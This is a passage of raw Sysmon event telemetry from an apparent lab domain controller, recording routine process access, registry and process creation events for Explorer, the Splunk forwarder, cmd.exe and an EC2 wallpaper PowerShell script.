/nC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=BB38581A13B7265CF4E62741955E7457,SHA256=103C028F6ED13FDF916B0B15138BDFE66CAC0D667D735D853FC8E45341FE8A3A,IMPHASH=C799FE056F8DF24A5E47C4D509C9D61C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 12241200x800000000000000013386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1060,RunKeyDeleteValue2021-01-18 13:58:47.382{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exe 10341000x800000000000000013385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.148{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.023{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 
10341000x800000000000000013369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\S